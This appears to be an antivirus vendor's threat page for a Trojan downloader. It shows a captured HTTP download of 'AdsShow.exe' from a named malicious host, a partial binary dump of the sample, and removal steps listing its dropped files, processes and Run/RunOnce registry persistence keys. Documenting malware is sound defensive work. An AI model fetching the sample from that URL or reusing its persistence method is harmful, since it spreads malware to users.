GET /safe_download/582369/AdsShow.exe HTTP/1.1
Host: nihamatioto.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Fri, 28 Jul 2017 11:59:47 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="AdsShow.exe"
Content-Length: 7680
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L...7.{Y
.........."...0..............1... ...@....@.. ........................
............@.................................81..O....@..(...........
.........`.......0............................................... ....
........... ..H............text........ ...................... ..`.rsr
c...(....@......................@..@.reloc.......`....................
..@..B................l1......H........!..\...........H/..............
.................................0..........s.......,H~....r...p.o....
%(....r]..pra..po....rc..p(....o....rc..p(....o....o....rg..p(.....-4.
.,. `......o....Z(...... .. ....&&..X.. ....2.(.... `.......o....Z(...
. .&..*....................0..\......... .. ....&&.. ...X.. ....2...X.
. ....2.rw..p( ...&.. .. ....&&.. ...X.. ....2...X.. ....2.*..(!...*.~
....-.r...p.....("...o#...s$........~....*.~....*.......*.~....*..(%..
.*Vs....(&...t.........*BSJB............v2.0.50727......l.......#~..x.
..|...#Strings........<...#US.0.......#GUID...@.......#Blob........
...W..........3........$...................&..........................
.....................Z.W.....W.....%...............=.................z
...................8...L.8...........\.....\...c.\.....\...Z.....q.%..
.1.W.....w...........>.....>.........q.....G.....,.....%.\...h..
.....%...-.......\...Y.\.........................T...=.........1...=..
.......~...=.............i.......j...........I...P ......v......!.
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    SecondL.exe:1692
    Sho9libi.exe:1764
    OneTwo.exe:2320
    %original file name%.exe:3424

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (856 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\3ma3tvo2xkd\is4p1fniere.exe.config (1 bytes)
    C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (856 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (860 bytes)
    %Program Files%\KRH6BP3WSZ\uninstaller.exe.config (1 bytes)
    %Program Files%\KRH6BP3WSZ\KRH6BP3WS.exe (124075 bytes)
    %Program Files%\KRH6BP3WSZ\KRH6BP3WS.exe.config (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0UPP3DK5O7\OneTwo.exe (17797 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0UPP3DK5O7\SecondL.exe (1117 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0UPP3DK5O7\SecondL.exe.config (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0UPP3DK5O7\OneTwo.exe.config (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0UPP3DK5O7\Sho9libi.exe (230392 bytes)
    C:\config.conf (47 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0UPP3DK5O7\Sho9libi.exe.config (1 bytes)
    %Program Files%\KRH6BP3WSZ\cast.config (37 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
    "OMEWPRODUCT_R2ZKP" = "C:\%original file name%.exe"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "HDURM51XOVAKJHF" = "%Program Files%\KRH6BP3WSZ\KRH6BP3WS.exe"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "4ffk2bt3ky1" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\3ma3tvo2xkd\is4p1fniere.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2025 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now